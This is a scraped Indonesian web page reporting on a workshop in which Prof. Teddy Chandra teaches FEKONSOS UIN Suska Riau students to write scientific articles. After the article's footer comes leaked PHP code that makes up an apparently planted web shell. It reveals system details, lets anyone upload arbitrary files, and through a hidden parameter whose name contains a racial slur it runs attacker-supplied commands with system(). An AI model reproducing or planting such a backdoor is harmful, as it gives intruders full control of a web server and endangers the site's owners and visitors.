#

Prof. Teddy Chandra Latih Mahasiswa FEKONSOS UIN SUSKA Menulis Artikel Ilmiah

Salah satu kewajiban akhir bagi seorang mahasiswa adalah melakukan penelitian dan menuliskan laporan hasilnya dalam bentuk skripsi. Tidak cukup hanya sampai disitu, saat ini mahasiswa juga sudah diwajibkan untuk mempublikasikan hasil penelitiannya ke jurnal-jurnal ilmiah. Agar hal ini bisa dilakukan, maka tentu saja diperlukan kemampuan untuk menulis artikel ilmiah dari skripsi yang mereka tulis. Untuk itu maka Fakultas Ekonomi dan Ilmu Sosial Universitas Islam Negeri Suska Riau mengadakan workshop penulisan artikel ilmiah bagi mahasiswanya, dengan mengundang Prof. Dr. Teddy Chandra, S.E., M.M. sebagai narasumbernya.

Prof. Dr. Teddy Chandra, S.E., M.M. merupakan guru besar Institut Bisnis dan Teknologi (IBT) Pelita Indonesia dengan fokus keilmuan di bidang manajemen. Beliau memiliki rekam jejak yang mengagumkan dalam hal publikasi artikel ilmiah. Setidaknya hingga saat ini tercatat lebih dari 50 artikel ilmiah beliau telah dipublikasi di berbagai jurnal bereputasi, baik itu di jurnal nasional, maupun di jurnal internasional, yang juga telah dikutip sebanyak 892 kali oleh peneliti lainnya.

Di dalam materinya, Prof. Dr. Teddy Chandra, SE., MM. menjelaskan terlebih dahulu perbedaan utama antara skripsi dengan artikel ilmiah. Kemudian beliau menjelaskan beberapa hal yang harus diperhatikan di dalam penulisan artikel ilmiah agar dapat diterima di jurnal-jurnal bereputasi. Tidak hanya sebatas materi, beliau juga memberikan langsung contoh-contoh penulisan artikel ilmiah yang baik. Materi dan contoh-contoh yang diberikan oleh Prof. Dr. Teddy Chandra, S.E., M.M. telah terbukti mampu meningkatkan jumlah publikasi ilmiah di lingkungan IBT Pelita Indonesia. Untuk itu harapan beliau juga semoga materi dan contoh-contoh yang beliau berikan pada kegiatan workshop kali ini juga mampu meningkatkan jumlah publikasi mahasiswa di Fekonsos UIN Suska Riau.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>